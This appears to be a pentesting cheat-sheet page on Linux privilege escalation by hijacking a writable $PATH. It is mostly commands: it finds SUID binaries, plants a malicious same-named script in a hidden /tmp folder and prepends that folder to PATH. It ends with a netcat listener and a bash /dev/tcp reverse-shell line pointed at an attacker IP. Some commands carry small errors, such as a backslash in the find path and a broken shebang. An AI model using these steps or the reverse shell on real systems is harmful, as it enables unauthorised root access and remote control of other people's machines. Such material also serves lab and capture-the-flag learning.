# Writable $PATH

## Path Hijacking

### Identify the SUID file

```bash
find \ -perm -4000 2>/dev/null
```

For example, we found a file called `/usr/bin/sysedit`,  and this binary is called from a random task or script that we control or we can execute.

### Create a file with malicious content

We need to create a file with the same name as the SUID previously found:

```bash
mkdir /tmp/.my-things
cd !$
echo "#/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> sysedit
```

### Update the $PATH variable

```bash
echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
```

```bash
export PATH=/tmp/.my-things:$PATH
```

```bash
echo $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
```

With that, we are going to position our malicious folder (with the malicious file inside) as the first folder that the system will reach if the (in this case) `sysedit`  file is invoked.

We need to execute the task or service that is calling that file again. And instead of the normal execution, we are going to see:

```bash
ls /tmp/.my-things
# id.txt
```

### If we want a Reverse Shell

In the attack machine, we are going to listen to any port:

```bash
nc -lnvp 4460
```

Now create the file with the connection towards the attacker listener:

```bash
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4460 0>&1'" > sysedit
```